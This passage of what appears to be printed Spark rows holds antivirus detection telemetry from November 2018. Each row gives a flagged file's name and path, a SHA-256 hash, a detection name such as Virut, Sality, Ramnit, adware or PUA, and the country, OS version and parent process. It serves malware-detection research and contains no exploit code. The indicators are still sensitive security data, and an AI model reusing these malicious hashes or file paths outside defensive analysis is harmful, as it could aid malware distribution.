  Row(detection=Row(filename='avscan-20181104-140215-ef6e5032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140215-EF6E5032', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:02:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl15d.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl15D.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029110b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029110b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:45:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:24:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133225-98735793', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133225-98735793', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aeee', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aeee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:08:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C832ED6B008734995EBE31A3CF48E229E9D40A3CDEAF74E8E319C47E4F7A251C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:29:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3773fe3fdb304eacad65fb514a4a2e9e90194ae39b0beb082ac5d2008b87cf4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T12:13:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobe pagemaker 7.0.exe', filepath='F:\\\xa0\\Adobe Pagemaker 7.0\\Adobe Pagemaker 7.0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:08:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='the rasterbator installer.exe', filepath='\\\\DATENSERVER\\Daten\\DR-ACER-HOME-Joerg\\20140817_181511\\DRIVEE\\Downloads\\The Rasterbator Installer.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ed9dab9bf727d1f1a9fb1b206024b66130ef0437038c5a821870e5712a1d2d38', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:08:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jre-6u6-.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\SINSIN\\SINTA\\MOZILLAF\\JRE-6U6-.EXE', filesize=16000000, name='W32/Sality.#M1.#R1'), hash='f313966834d171fdf8d05425e399943b8329ab37f10dc1fe4b0f4e590f750ae3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:06:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[7].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[7].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0371330.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1593\\A0371330.exe', filesize=1036000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='fdad1548265e9b9f1d7068982308447cdc643fc7291b1ec56bfd1c1a55622d40', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:59Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-161753-6171baa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161753-6171BAA1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9942144\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/ref:YHR0cVpbWxU1LDV5Wk1RVyk\\\\\\/Mj9EWEBUajsvOUVIXVotJTooRkFJSjIvOhVRXEo...w5xRzZlNwB7NQZPDX1hcjdSThZYJSB6N0RgcQg \\\\\\/host:YgR0c1grWwQvXHVgTjgUCCFceWdHMw1JJF...2c4LEZXARVzZDcsQVEZSTk0bT1JDkISPnl8k3o \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Free VPN Unlimited Proxy - Proxy Master_Setup_1099536925.exe', parentsize=2301712, timestamp='2018-11-02T02:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155859-e6b17c8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155859-E6B17C8F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7312997\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/host:beR0dVfLWwIgvHVgT94QBiG7eGNPzlYAIKN5c0ubSx5\\\\\\/\\\\\\/WRUHosFB3v\\\\\\/cHdVmggSIa3FlQ \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\MEUS DOCUMENTOS\\Downloads\\DOWNLOADS DO CHROME\\JavaSetup_3381338380.exe', parentsize=2357220, timestamp='2018-11-02T22:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4159528\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\poweriso-6-7.exe', parentsize=3862600, timestamp='2018-11-02T15:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15D48CED869114D974CD56C0999A6CF81B73FCF3E3806558BE64D94187D42536', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfcreatorsetup(1).exe', filepath='G:\\autres dossiers\\PC Eva\\ordinateur Eva\\Downloads\\PdfCreatorSetup(1).exe', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='38583d6da1a5ee97df361ff2b804765c341eccab1ffa133835c026adfb52073d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:05:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverimportpe.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DriverImportPE.exe", filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='consoleapplication1 (2017_06_17 11_23_43 utc).exe', filepath='\\\\?\\Y:\\FileHistory\\Ty\\AION\\Data\\C\\Users\\Ty\\Documents\\Visual Studio 2017\\Projects\\EmptyProject1\\x64\\Debug\\ConsoleApplication1 (2017_06_17 11_23_43 UTC).exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='28b528023ad5d69fb89488a4da2e8e74173bbc4a0e0c17a8e31392086cabd6b4', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='explorer.exe', filepath='d:\\windows\\explorer.exe', filesize=2816000, name='W32/Virut.Gen.#M1.#R1'), hash='1c25407da39ce5b376146e95066623dbf9d65c378694d2af10ea083af78dcd07', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2eb71e9855faf2aa86a4eabc7cff77c755c006a84d89e9ee5678c573fe32039c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\2EB71E9855FAF2AA86A4EABC7CFF77C755C006A84D89E9EE5678C573FE32039C', filesize=576000, name='HEUR/AGEN.1000014.#M1.#R1'), hash='2eb71e9855faf2aa86a4eabc7cff77c755c006a84d89e9ee5678c573fe32039c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T12:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='media_issues.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Media_Issues\\Media_Issues.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:46:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='giao an lop 5 ca nam 20172018 soan rat chi tiet cktkn gdkns gdbvmt bien dao.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\Giao an lop 5 ca nam 20172018 soan rat chi tiet CKTKN GDKNS GDBVMT bien dao.exe', filesize=3456000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4b5623ed6d755e5d916540b19be673c5c238a553fe194d57cd0137d382532598', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T10:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='guid-849ba1c9-1360-475e-9f01-4f35dde73330-1.htm', filepath='D:\\acad2013\\en-US\\Docs\\acad_install_help\\files\\GUID-849BA1C9-1360-475E-9F01-4F35DDE73330-1.htm', filesize=228000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='33543c012ed52b953846f308059dce5fcae5b3c03ced288fc620305df181266c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T23:48:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T17:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101103-b1b99c0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101103-B1B99C0D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5232.5844\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5232.5844\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151417-a1f9b9f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8046b55c\\AVSCAN-20181102-151347-9D254F21\\AVSCAN-20181102-151417-A1F9B9F1', filesize=232000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='0deefadd6ab11ecf8248acb182649d5eb80e9f54e1df1795ca70fa53b184397f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='07c11b66336d0198a9145e55da554b323bac24812d95b2352092957aaf1d168b', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T05:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sxx.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\sxx.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:05Z'), dt=datetime.date(2018, 11, 2)),
